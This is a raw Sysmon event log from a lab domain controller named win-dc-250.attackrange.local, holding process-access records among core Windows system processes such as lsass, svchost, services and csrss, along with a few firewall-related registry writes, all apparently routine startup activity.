13:09:28.275{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000768Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.275{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000767Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.275{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000766Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.213{08A6967A-4287-6000-0C00-000000009A01}588632C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000765Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.213{08A6967A-4287-6000-0C00-000000009A01}588632C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000764Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.213{08A6967A-4287-6000-0C00-000000009A01}588632C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000763Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.213{08A6967A-4287-6000-0C00-000000009A01}588632C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0500-000000009A01}636C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000762Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.213{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0800-000000009A01}716C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.197{08A6967A-4287-6000-0C00-000000009A01}588660C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0800-000000009A01}716C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.197{08A6967A-4287-6000-0C00-000000009A01}588660C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.197{08A6967A-4287-6000-0C00-000000009A01}588660C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.197{08A6967A-4287-6000-0C00-000000009A01}588660C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0500-000000009A01}636C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.197{08A6967A-4287-6000-0C00-000000009A01}588660C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0700-000000009A01}708C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.197{08A6967A-4287-6000-0C00-000000009A01}588660C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0700-000000009A01}708C:\Windows\system32\wininit.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.197{08A6967A-4284-6000-0200-000000009A01}452460C:\Windows\System32\smss.exe{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\system32\svchost.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000754Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.166{08A6967A-4288-6000-0D00-000000009A01}612C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x8000000000000000753Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.166{08A6967A-4288-6000-0D00-000000009A01}612C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x8000000000000000752Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.166{08A6967A-4288-6000-0D00-000000009A01}612C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 10341000x8000000000000000751Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.135{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0700-000000009A01}708C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000750Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.135{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0700-000000009A01}708C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000749Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.135{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0D00-000000009A01}612C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+46888|c:\windows\system32\rpcss.dll+3a983|c:\windows\system32\rpcss.dll+3a8ee|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000748Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.119{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000747Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.119{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-0D00-000000009A01}612C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000746Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.119{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4288-6000-0D00-000000009A01}612C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.103{08A6967A-4286-6000-0A00-000000009A01}844936C:\Windows\system32\services.exe{08A6967A-4288-6000-0D00-000000009A01}612C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.103{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4288-6000-0D00-000000009A01}612C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.103{08A6967A-4286-6000-0A00-000000009A01}844848C:\Windows\system32\services.exe{08A6967A-4288-6000-0D00-000000009A01}612C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+19bbb|C:\Windows\system32\services.exe+1d91b|C:\Windows\system32\services.exe+22933|C:\Windows\system32\services.exe+23dec|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.088{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.088{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.088{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 